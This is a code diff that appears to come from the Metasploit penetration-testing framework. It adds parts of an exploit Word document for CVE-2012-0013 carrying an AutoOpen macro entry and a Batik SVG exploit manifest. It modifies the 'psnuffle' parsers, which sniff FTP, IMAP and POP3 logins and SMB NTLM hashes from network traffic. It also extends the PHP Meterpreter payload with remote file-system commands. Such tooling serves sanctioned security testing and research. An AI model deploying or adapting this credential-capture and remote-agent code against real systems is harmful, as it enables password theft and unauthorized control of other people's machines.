+<w:fonts xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14"><w:font w:name="Calibri"><w:panose1 w:val="020F0502020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="E10002FF" w:usb1="4000ACFF" w:usb2="00000009" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/></w:font><w:font w:name="Times New Roman"><w:panose1 w:val="02020603050405020304"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="E0002AFF" w:usb1="C0007841" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Cambria"><w:panose1 w:val="02040503050406030204"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="E00002FF" w:usb1="400004FF" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/></w:font></w:fonts>

data/exploits/CVE-2012-0013/word/settings.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:settings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main" mc:Ignorable="w14"><w:zoom w:percent="100"/><w:proofState w:spelling="clean" w:grammar="clean"/><w:defaultTabStop w:val="720"/><w:characterSpacingControl w:val="doNotCompress"/><w:compat><w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="14"/><w:compatSetting w:name="overrideTableStyleFontSizeAndJustification" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="enableOpenTypeFeatures" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="doNotFlipMirrorIndents" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/></w:compat><w:rsids><w:rsidRoot w:val="002B771F"/><w:rsid w:val="002B771F"/><w:rsid w:val="006042EE"/><w:rsid w:val="00EB5F66"/></w:rsids><m:mathPr><m:mathFont m:val="Cambria Math"/><m:brkBin m:val="before"/><m:brkBinSub m:val="--"/><m:smallFrac m:val="0"/><m:dispDef/><m:lMargin m:val="0"/><m:rMargin m:val="0"/><m:defJc m:val="centerGroup"/><m:wrapIndent m:val="1440"/><m:intLim m:val="subSup"/><m:naryLim m:val="undOvr"/></m:mathPr><w:themeFontLang w:val="en-US"/><w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/><w:shapeDefaults><o:shapedefaults v:ext="edit" spidmax="1027"/><o:shapelayout v:ext="edit"><o:idmap v:ext="edit" data="1"/></o:shapelayout></w:shapeDefaults><w:decimalSymbol w:val="."/><w:listSeparator w:val=","/></w:settings>

data/exploits/CVE-2012-0013/word/vbaData.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData>

data/exploits/CVE-2012-0013/word/webSettings.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:webSettings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14"><w:optimizeForBrowser/><w:allowPNG/></w:webSettings>

data/exploits/batik_svg/META-INF/MANIFEST.MF

@@ -0,0 +1,3 @@
+Manifest-Version: 1.0
+SVG-Handler-Class: Exploit
+

data/exploits/psnuffle/ftp.rb

@@ -15,6 +15,7 @@ class SnifferFTP < BaseProtocolParser
 			:pass		=> /^PASS\s+([^\s]+)/i,
 			:login_pass => /^(230\s*[^\n]+)/i,
 			:login_fail => /^(5\d\d\s*[^\n]+)/i,
+			:bye      => /^221/
 		}
 	end
 
@@ -23,6 +24,7 @@ class SnifferFTP < BaseProtocolParser
 		return unless pkt.is_tcp?
 		return if (pkt.tcp_sport != 21 and pkt.tcp_dport != 21)
 		s = find_session((pkt.tcp_sport == 21) ? get_session_src(pkt) : get_session_dst(pkt))
+		s[:sname] ||= "ftp"
 
 		self.sigs.each_key do |k|
 			# There is only one pattern per run to test
@@ -38,21 +40,17 @@ class SnifferFTP < BaseProtocolParser
 
 			when :login_fail
 				if(s[:user] and s[:pass])
-					s[:proto]="ftp"
-					s[:extra]="Failed Login. Banner: #{s[:banner]}"
-					report_auth_info(s)
-					print_status("Failed FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
+					report_auth_info(s.merge({:active => false}))
+					print_status("Failed FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}")
 
-					s[:pass]=""
+					s[:pass] = ""
 					return
 				end
 
 			when :login_pass
 				if(s[:user] and s[:pass])
-					s[:proto]="ftp"
-					s[:extra]="Successful Login. Banner: #{s[:banner]}"
 					report_auth_info(s)
-					print_status("Successful FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
+					print_status("Successful FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}")
 					# Remove it form the session objects so freeup memory
 					sessions.delete(s[:session])
 					return
@@ -60,12 +58,14 @@ class SnifferFTP < BaseProtocolParser
 
 			when :banner
 				# Because some ftp server send multiple banner we take only the first one and ignore the rest
-				if not (s[:banner])
-					sessions[s[:session]].merge!({k => matches})
-					s[:name]="FTP Server Welcome Banner: \"#{s[:banner]}\""
+				if not (s[:info])
+					s[:info] = matches
 					report_service(s)
 				end
 
+			when :bye
+				sessions.delete(s[:session])
+
 			when nil
 				# No matches, no saved state
 			else

data/exploits/psnuffle/imap.rb

@@ -25,6 +25,7 @@ class SnifferIMAP < BaseProtocolParser
 		return unless pkt.is_tcp?
 		return if (pkt.tcp_sport != 143 and pkt.tcp_dport != 143)
 		s = find_session((pkt.tcp_sport == 143) ? get_session_src(pkt) : get_session_dst(pkt))
+		s[:sname] ||= "imap4"
 
 		self.sigs.each_key do |k|
 			# There is only one pattern per run to test
@@ -38,14 +39,11 @@ class SnifferIMAP < BaseProtocolParser
 
 			case matched
 			when :banner
-				s[:banner] = matches
-				s[:name]   = "IMAP Server Welcome Banner: #{s[:banner]}"
+				s[:info] = matches
 				report_service(s)
 
 			when :login_pass
 
-				s[:proto]="imap4"
-				s[:extra]="Sucessful Login. Banner: #{s[:banner]}"
 				report_auth_info(s)
 				print_status("Successful IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
 
@@ -54,18 +52,14 @@ class SnifferIMAP < BaseProtocolParser
 
 			when :login_fail
 
-				s[:proto]="imap4"
-				s[:extra]="Failed Login. Banner: #{s[:banner]}"
-				report_auth_info(s)
+				report_auth_info(s.merge({:active => false}))
 				print_status("Failed IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
 
 				# Remove it form the session objects so freeup
 				sessions.delete(s[:session])
 
 			when :login_bad
-				s[:proto]="imap4"
-				s[:extra]="Failed Login. Banner: #{s[:banner]}"
-				report_auth_info(s)
+				report_auth_info(s.merge({:active => false}))
 				print_status("Bad IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
 
 				# Remove it form the session objects so freeup

data/exploits/psnuffle/pop3.rb

@@ -38,8 +38,9 @@ class SnifferPOP3 < BaseProtocolParser
 					case s[:last]
 						when nil
 							# Its the first +OK must include the banner, worst case its just +OK
-							s[:banner] = matches
-							s[:name]   = "POP3 Server Welcome Banner: \"#{s[:banner]}\""
+							s[:info]  = matches
+							s[:proto] = "tcp"
+							s[:name]  = "pop3"
 							report_service(s)
 
 						when :user
@@ -48,8 +49,9 @@ class SnifferPOP3 < BaseProtocolParser
 						when :pass
 							# Perfect we get an +OK after a PASS command this means right password given :-)
 
-							s[:proto]="pop3"
-							s[:extra]="Successful Login. Banner: #{s[:banner]}"
+							s[:proto] = "tcp"
+							s[:name]  = "pop3"
+							s[:extra] = "Successful Login. Banner: #{s[:banner]}"
 							report_auth_info(s)
 							print_status("Successful POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
 

data/exploits/psnuffle/smb.rb

@@ -5,26 +5,31 @@
 #
 
 #Memo : 
-# Authentification without extended security set
-	#1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec  =  0
-	#2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec  =  0 and contains server challenge (aka encryption key) and wordcount = 17
-	#3) client -> server : smb_setup_andx (0x73) : contains lm/ntlm hashes and wordcount = 13 (not 0)
-	#4) server -> client : smb_setup_andx (0x73) : if status = success then authentification ok
+#FOR SMBV1
+	# Authentification without extended security set
+		#1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec  =  0
+		#2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec  =  0 and contains server challenge (aka encryption key) and wordcount = 17
+		#3) client -> server : smb_setup_andx (0x73) : contains lm/ntlm hashes and wordcount = 13 (not 0)
+		#4) server -> client : smb_setup_andx (0x73) : if status = success then authentification ok
 
-# Authentification with extended security set
-	#1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec  =  1
-	#2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec  =  1
-	#3) client -> server : smb_setup_andx (0x73) : contains an ntlm_type1 message
-	#4) server -> client : smb_setup_andx (0x73) : contains an ntlm_type2 message with the server challenge
-	#5) client -> server : smb_setup_andx (0x73) : contains an ntlm_type3 message with the lm/ntlm hashes
-	#6) server -> client : smb_setup_andx (0x73) : if status = success then authentification = ok
+	# Authentification with extended security set
+		#1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec  =  1
+		#2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec  =  1
+		#3) client -> server : smb_setup_andx (0x73) : contains an ntlm_type1 message
+		#4) server -> client : smb_setup_andx (0x73) : contains an ntlm_type2 message with the server challenge
+		#5) client -> server : smb_setup_andx (0x73) : contains an ntlm_type3 message with the lm/ntlm hashes
+		#6) server -> client : smb_setup_andx (0x73) : if status = success then authentification = ok
+#FOR SMBV2
+	#SMBv2 is pretty similar. However, extended security is always set and it is using a newer set of smb negociate and session_setup command for requets/response 
 
 class SnifferSMB < BaseProtocolParser
 
 	def register_sigs
 		self.sigs = {
-			:setupandx		=> /\xffSMB\x73/,
-			:negotiate		=> /\xffSMB\x72/,
+			:smb1_negotiate		=> /\xffSMB\x72/n,
+			:smb1_setupandx		=> /\xffSMB\x73/n,
+			#:smb2_negotiate	=> /\xFESMB\x40\x00(.){6}\x00\x00/n,
+			:smb2_setupandx		=> /\xFESMB\x40\x00(.){6}\x01\x00/n
 		}
 	end
 
@@ -45,7 +50,7 @@ class SnifferSMB < BaseProtocolParser
 			end
 
 			case matched
-			when :negotiate
+			when :smb1_negotiate
 				payload = pkt.payload.dup
 				wordcount = payload[36,1].unpack("C")[0]
 				#negotiate response
@@ -54,128 +59,16 @@ class SnifferSMB < BaseProtocolParser
 					#the server challenge is here
 					if flags2 & 0x800 == 0
 						s[:challenge] = payload[73,8].unpack("H*")[0]
-						s[:last]  = :negotiate
+						s[:last]  = :smb1_negotiate
 					end
 				end
 
-			when :setupandx
-				payload = pkt.payload.dup
-
-				ntlmpayload = payload[/NTLMSSP\x00.*/m]
-				if ntlmpayload
-					ntlmmessagetype = ntlmpayload[8,4].unpack("V")[0]
-					case ntlmmessagetype
-					when 2 # challenge
-						s[:challenge] = ntlmpayload[24,8].unpack("H*")[0]
-						s[:last] = :ntlm_type2
-					when 3 # auth
-						if s[:last] == :ntlm_type2
-							lmlength = 	ntlmpayload[12, 2].unpack("v")[0]
-							lmoffset = 	ntlmpayload[16, 2].unpack("v")[0]
-							ntlmlength = 	ntlmpayload[20, 2].unpack("v")[0]
-							ntlmoffset = 	ntlmpayload[24, 2].unpack("v")[0]
-							domainlength = 	ntlmpayload[28, 2].unpack("v")[0]
-							domainoffset = 	ntlmpayload[32, 2].unpack("v")[0]
-							usrlength = 	ntlmpayload[36, 2].unpack("v")[0]
-							usroffset = 	ntlmpayload[40, 2].unpack("v")[0]
-
-							s[:lmhash] = 	ntlmpayload[lmoffset, lmlength].unpack("H*")[0] || ''
-							s[:ntlmhash] =      ntlmpayload[ntlmoffset, ntlmlength].unpack("H*")[0] || ''
-							s[:domain] =	ntlmpayload[domainoffset, domainlength].gsub("\x00","") || ''
-							s[:user] =		ntlmpayload[usroffset, usrlength].gsub("\x00","") || ''
-
-							secbloblength = payload[51,2].unpack("v")[0]
-							names = (payload[63..-1][secbloblength..-1] || '').split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
-							s[:peer_os]   = names[0] || ''
-							s[:peer_lm]   = names[1] || ''
-							s[:last] = :ntlm_type3
-						end
-					end
-				else
-					wordcount = payload[36,1].unpack("C")[0]
-					#authentification without smb extended security (smbmount, msf server capture)
-					if wordcount == 13 and s[:last]  == :negotiate
-						lmlength = 	payload[51,2].unpack("v")[0]
-						ntlmlength = 	payload[53,2].unpack("v")[0]
-						s[:lmhash] = 	payload[65,lmlength].unpack("H*")[0]
-						s[:ntlmhash] =  payload[65 + lmlength, ntlmlength].unpack("H*")[0]
-						
-						names = payload[Range.new(65 + lmlength + ntlmlength,-1)].split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
-
-						s[:user] = names[0]
-						s[:domain]   = names[1]
-						s[:peer_os]   = names[2]
-						s[:peer_lm]   = names[3]
-						s[:last] = :smb_no_ntlm
-					else
-						#answer from server
-						if s[:last] == :ntlm_type3 or s[:last] == :smb_no_ntlm
-							#do not output anonymous/guest logging
-							unless s[:user] == '' or s[:ntlmhash] == '' or s[:ntlmhash] =~ /^(00)*$/m
-								#set lmhash to a default value if not provided						   	
-								s[:lmhash] = "00" * 24 if s[:lmhash] == '' or s[:lmhash] =~ /^(00)*$/m 
-								s[:lmhash] = "00" * 24 if s[:lmhash] == s[:ntlmhash]
-
-								smb_status = payload[9,4].unpack("V")[0]
-								if smb_status == 0 # success
-
-									ntlm_ver = detect_ntlm_ver(s[:lmhash],s[:ntlmhash])
-
-									logmessage =
-										"#{ntlm_ver} Response Captured in session : #{s[:session]} \n" +
-										"USER:#{s[:user]} DOMAIN:#{s[:domain]} OS:#{s[:peer_os]} LM:#{s[:peer_lm]}\n" +
-										"SERVER CHALLENGE:#{s[:challenge]} " + 
-										"\nLMHASH:#{s[:lmhash]} " + 
-										"\nNTHASH:#{s[:ntlmhash]}\n"
-									print_status(logmessage)
-
-									src_ip = s[:host]
-									dst_ip = s[:session].split("-")[1].split(":")[0]
-									# know this is ugly , last code added :-/
-									smb_db_type_hash = case ntlm_ver
-									       when "NTLMv1" 		then "smb_netv1_hash"
-									       when "NTLM2_SESSION" 	then "smb_netv1_hash"
-									       when "NTLMv2" 		then "smb_netv2_hash"
-									       end
-									# DB reporting
-									report_auth_info(
-										:host  => dst_ip,
-										:port => 445,
-										:sname => 'smb',
-										:user => s[:user],
-										:pass => s[:domain] + ":" + s[:lmhash] + ":" + s[:ntlmhash] + ":" + s[:challenge],
-										:type => smb_db_type_hash,
-										:proof => "DOMAIN=#{s[:domain]} OS=#{s[:peer_os]}",
-										:active => true
-									)
-
-									report_note(
-										:host  => src_ip,
-										:type  => "smb_peer_os",
-										:data  => s[:peer_os]
-									) if (s[:peer_os] and s[:peer_os].strip.length > 0)
-
-									report_note(
-										:host  => src_ip,
-										:type  => "smb_peer_lm",
-										:data  => s[:peer_lm]
-									) if (s[:peer_lm] and s[:peer_lm].strip.length > 0)
-
-									report_note(
-										:host  => src_ip,
-										:type  => "smb_domain",
-										:data  => s[:domain]
-									) if (s[:domain] and s[:domain].strip.length > 0)
-
-								end
-							end
-						end
-						s[:last] = nil
-						sessions.delete(s[:session])
-					end
-
-				end
-
+			when :smb1_setupandx
+				s[:smb_version]  = "SMBv1"
+				parse_sessionsetup(pkt, s)
+			when :smb2_setupandx
+				s[:smb_version]  = "SMBv2"
+				parse_sessionsetup(pkt, s)
 			when nil
 				# No matches, no saved state
 			else
@@ -197,6 +90,122 @@ class SnifferSMB < BaseProtocolParser
 		else
 			raise RuntimeError, "Unknow hash type"
 		end
+	end
 
+	def parse_sessionsetup(pkt, s)
+		payload = pkt.payload.dup
+		ntlmpayload = payload[/NTLMSSP\x00.*/m]
+		if ntlmpayload
+			ntlmmessagetype = ntlmpayload[8,4].unpack("V")[0]
+			case ntlmmessagetype
+			when 2 # challenge
+				s[:challenge] = ntlmpayload[24,8].unpack("H*")[0]
+				s[:last] = :ntlm_type2
+			when 3 # auth
+				if s[:last] == :ntlm_type2
+					lmlength = 	ntlmpayload[12, 2].unpack("v")[0]
+					lmoffset = 	ntlmpayload[16, 2].unpack("v")[0]
+					ntlmlength = 	ntlmpayload[20, 2].unpack("v")[0]
+					ntlmoffset = 	ntlmpayload[24, 2].unpack("v")[0]
+					domainlength = 	ntlmpayload[28, 2].unpack("v")[0]
+					domainoffset = 	ntlmpayload[32, 2].unpack("v")[0]
+					usrlength = 	ntlmpayload[36, 2].unpack("v")[0]
+					usroffset = 	ntlmpayload[40, 2].unpack("v")[0]
+
+					s[:lmhash] = 	ntlmpayload[lmoffset, lmlength].unpack("H*")[0] || ''
+					s[:ntlmhash] =      ntlmpayload[ntlmoffset, ntlmlength].unpack("H*")[0] || ''
+					s[:domain] =	ntlmpayload[domainoffset, domainlength].gsub("\x00","") || ''
+					s[:user] =		ntlmpayload[usroffset, usrlength].gsub("\x00","") || ''
+
+					secbloblength = payload[51,2].unpack("v")[0]
+					names = (payload[63..-1][secbloblength..-1] || '').split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
+					s[:peer_os]   = names[0] || ''
+					s[:peer_lm]   = names[1] || ''
+					s[:last] = :ntlm_type3
+				end
+			end
+		else
+			wordcount = payload[36,1].unpack("C")[0]
+			#authentification without smb extended security (smbmount, msf server capture)
+			if wordcount == 13 and s[:last]  == :smb1_negotiate and s[:smb_version]  == "SMBv1"
+				lmlength = 	payload[51,2].unpack("v")[0]
+				ntlmlength = 	payload[53,2].unpack("v")[0]
+				s[:lmhash] = 	payload[65,lmlength].unpack("H*")[0]
+				s[:ntlmhash] =  payload[65 + lmlength, ntlmlength].unpack("H*")[0]
+			
+				names = payload[Range.new(65 + lmlength + ntlmlength,-1)].split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
+
+				s[:user] = names[0]
+				s[:domain]   = names[1]
+				s[:peer_os]   = names[2]
+				s[:peer_lm]   = names[3]
+				s[:last] = :smb_no_ntlm
+			else
+				#answer from server
+				if s[:last] == :ntlm_type3 or s[:last] == :smb_no_ntlm
+					#do not output anonymous/guest logging
+					unless s[:user] == '' or s[:ntlmhash] == '' or s[:ntlmhash] =~ /^(00)*$/m
+						#set lmhash to a default value if not provided						   	
+						s[:lmhash] = "00" * 24 if s[:lmhash] == '' or s[:lmhash] =~ /^(00)*$/m 
+						s[:lmhash] = "00" * 24 if s[:lmhash] == s[:ntlmhash]
+
+						smb_status = payload[9,4].unpack("V")[0]
+						if smb_status == 0 # success
+
+							ntlm_ver = detect_ntlm_ver(s[:lmhash],s[:ntlmhash])
+
+							logmessage =
+								"#{ntlm_ver} Response Captured in #{s[:smb_version]} session : #{s[:session]} \n" +
+								"USER:#{s[:user]} DOMAIN:#{s[:domain]} OS:#{s[:peer_os]} LM:#{s[:peer_lm]}\n" +
+								"SERVER CHALLENGE:#{s[:challenge]} " + 
+								"\nLMHASH:#{s[:lmhash]} " + 
+								"\nNTHASH:#{s[:ntlmhash]}\n"
+							print_status(logmessage)
+
+							src_ip = s[:client_host]
+							dst_ip = s[:host]
+							# know this is ugly , last code added :-/
+							smb_db_type_hash = case ntlm_ver
+							       when "NTLMv1" 		then "smb_netv1_hash"
+							       when "NTLM2_SESSION" 	then "smb_netv1_hash"
+							       when "NTLMv2" 		then "smb_netv2_hash"
+							       end
+							# DB reporting
+							report_auth_info(
+								:host  => dst_ip,
+								:port => 445,
+								:sname => 'smb',
+								:user => s[:user],
+								:pass => s[:domain] + ":" + s[:lmhash] + ":" + s[:ntlmhash] + ":" + s[:challenge],
+								:type => smb_db_type_hash,
+								:proof => "DOMAIN=#{s[:domain]} OS=#{s[:peer_os]}",
+								:active => true
+							)
+
+							report_note(
+								:host  => src_ip,
+								:type  => "smb_peer_os",
+								:data  => s[:peer_os]
+							) if (s[:peer_os] and s[:peer_os].strip.length > 0)
+
+							report_note(
+								:host  => src_ip,
+								:type  => "smb_peer_lm",
+								:data  => s[:peer_lm]
+							) if (s[:peer_lm] and s[:peer_lm].strip.length > 0)
+
+							report_note(
+								:host  => src_ip,
+								:type  => "smb_domain",
+								:data  => s[:domain]
+							) if (s[:domain] and s[:domain].strip.length > 0)
+
+						end
+					end
+				end
+				s[:last] = nil
+				sessions.delete(s[:session])
+			end
+		end
 	end
 end

data/meterpreter/ext_server_stdapi.php

@@ -283,6 +283,7 @@ function cononicalize_path($path) {
 # traditionally used this to get environment variables from the server.
 #
 if (!function_exists('stdapi_fs_file_expand_path')) {
+register_command('stdapi_fs_file_expand_path');
 function stdapi_fs_file_expand_path($req, &$pkt) {
     my_print("doing expand_path");
     $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
@@ -320,8 +321,29 @@ function stdapi_fs_file_expand_path($req, &$pkt) {
 }
 }
 
+if (!function_exists('stdapi_fs_delete_dir')) {
+register_command('stdapi_fs_delete_dir');
+function stdapi_fs_delete_dir($req, &$pkt) {
+    my_print("doing rmdir");
+    $path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
+    $ret = @rmdir(cononicalize_path($path_tlv['value']));
+    return $ret ? ERROR_SUCCESS : ERROR_FAILURE;
+}
+}
+
+if (!function_exists('stdapi_fs_mkdir')) {
+register_command('stdapi_fs_mkdir');
+function stdapi_fs_mkdir($req, &$pkt) {
+    my_print("doing mkdir");
+    $path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
+    $ret = @mkdir(cononicalize_path($path_tlv['value']));
+    return $ret ? ERROR_SUCCESS : ERROR_FAILURE;
+}
+}
+
 # works
 if (!function_exists('stdapi_fs_chdir')) {
+register_command('stdapi_fs_chdir');
 function stdapi_fs_chdir($req, &$pkt) {
     my_print("doing chdir");
     $path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
@@ -332,6 +354,7 @@ function stdapi_fs_chdir($req, &$pkt) {
 
 # works
 if (!function_exists('stdapi_fs_delete')) {
+register_command('stdapi_fs_delete');
 function stdapi_fs_delete($req, &$pkt) {
     my_print("doing delete");
     $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_NAME);
@@ -342,6 +365,7 @@ function stdapi_fs_delete($req, &$pkt) {
 
 # works
 if (!function_exists('stdapi_fs_getwd')) {
+register_command('stdapi_fs_getwd');
 function stdapi_fs_getwd($req, &$pkt) {
     my_print("doing pwd");
     packet_add_tlv($pkt, create_tlv(TLV_TYPE_DIRECTORY_PATH, getcwd()));
@@ -352,6 +376,7 @@ function stdapi_fs_getwd($req, &$pkt) {
 # works partially, need to get the path argument to mean the same thing as in
 # windows
 if (!function_exists('stdapi_fs_ls')) {
+register_command('stdapi_fs_ls');
 function stdapi_fs_ls($req, &$pkt) {
     my_print("doing ls");
     $path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
@@ -392,6 +417,7 @@ function stdapi_fs_ls($req, &$pkt) {
 }
 
 if (!function_exists('stdapi_fs_separator')) {
+register_command('stdapi_fs_separator');
 function stdapi_fs_separator($req, &$pkt) {
     packet_add_tlv($pkt, create_tlv(TLV_TYPE_STRING, DIRECTORY_SEPARATOR));
     return ERROR_SUCCESS;
@@ -399,6 +425,7 @@ function stdapi_fs_separator($req, &$pkt) {
 }
 
 if (!function_exists('stdapi_fs_stat')) {
+register_command('stdapi_fs_stat');
 function stdapi_fs_stat($req, &$pkt) {
     my_print("doing stat");
     $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
@@ -431,6 +458,7 @@ function stdapi_fs_stat($req, &$pkt) {
 
 # works
 if (!function_exists('stdapi_fs_delete_file')) {
+register_command('stdapi_fs_delete_file');
 function stdapi_fs_delete_file($req, &$pkt) {
     my_print("doing delete");
     $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
@@ -446,6 +474,7 @@ function stdapi_fs_delete_file($req, &$pkt) {
 }
 
 if (!function_exists('stdapi_fs_search')) {
+register_command('stdapi_fs_search');
 function stdapi_fs_search($req, &$pkt) {
     my_print("doing search");
 
@@ -483,10 +512,50 @@ function stdapi_fs_search($req, &$pkt) {
 }
 }
 
+
+if (!function_exists('stdapi_fs_md5')) {
+register_command("stdapi_fs_md5");
+function stdapi_fs_md5($req, &$pkt) {
+    $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
+    $path = cononicalize_path($path_tlv['value']);
+
+		if (is_callable("md5_file")) {
+			$md5 = md5_file($path);
+		} else {
+			$md5 = md5(file_get_contents($path));
+		}
+		$md5 = pack("H*", $md5);
+		# Ghetto abuse of file name type to indicate the md5 result
+    packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $md5));
+    return ERROR_SUCCESS;
+}
+}
+
+
+if (!function_exists('stdapi_fs_sha1')) {
+register_command("stdapi_fs_sha1");
+function stdapi_fs_sha1($req, &$pkt) {
+    $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
+    $path = cononicalize_path($path_tlv['value']);
+
+		if (is_callable("sha1_file")) {
+			$sha1 = sha1_file($path);
+		} else {
+			$sha1 = sha1(file_get_contents($path));
+		}
+		$sha1 = pack("H*", $sha1);
+		# Ghetto abuse of file name type to indicate the sha1 result
+    packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $sha1));
+    return ERROR_SUCCESS;
+}
+}
+
+
 # Sys Config
 
 # works
 if (!function_exists('stdapi_sys_config_getuid')) {
+register_command('stdapi_sys_config_getuid');
 function stdapi_sys_config_getuid($req, &$pkt) {
     my_print("doing getuid");
     if (is_callable('posix_getuid')) {
@@ -505,15 +574,17 @@ function stdapi_sys_config_getuid($req, &$pkt) {
 }
 
 # Unimplemented becuase it's unimplementable
-if (!function_exists('stdapi_sys_config_rev2self')) {
-function stdapi_sys_config_rev2self($req, &$pkt) {
-    my_print("doing rev2self");
-    return ERROR_FAILURE;
-}
-}
+#if (!function_exists('stdapi_sys_config_rev2self')) {
+#register_command('stdapi_sys_config_rev2self');
+#function stdapi_sys_config_rev2self($req, &$pkt) {
+#    my_print("doing rev2self");
+#    return ERROR_FAILURE;
+#}
+#}
 
 # works
 if (!function_exists('stdapi_sys_config_sysinfo')) {
+register_command('stdapi_sys_config_sysinfo');
 function stdapi_sys_config_sysinfo($req, &$pkt) {
     my_print("doing sysinfo");
     packet_add_tlv($pkt, create_tlv(TLV_TYPE_COMPUTER_NAME, php_uname("n")));
@@ -526,6 +597,7 @@ function stdapi_sys_config_sysinfo($req, &$pkt) {
 $GLOBALS['processes'] = array();
 
 if (!function_exists('stdapi_sys_process_execute')) {
+register_command('stdapi_sys_process_execute');
 function stdapi_sys_process_execute($req, &$pkt) {
     global $channel_process_map, $processes;
 
@@ -600,6 +672,7 @@ function stdapi_sys_process_execute($req, &$pkt) {
 
 
 if (!function_exists('stdapi_sys_process_close')) {
+register_command('stdapi_sys_process_close');
 function stdapi_sys_process_close($req, &$pkt) {
     global $processes;
     my_print("doing process_close");
@@ -653,6 +726,7 @@ function close_process($proc) {
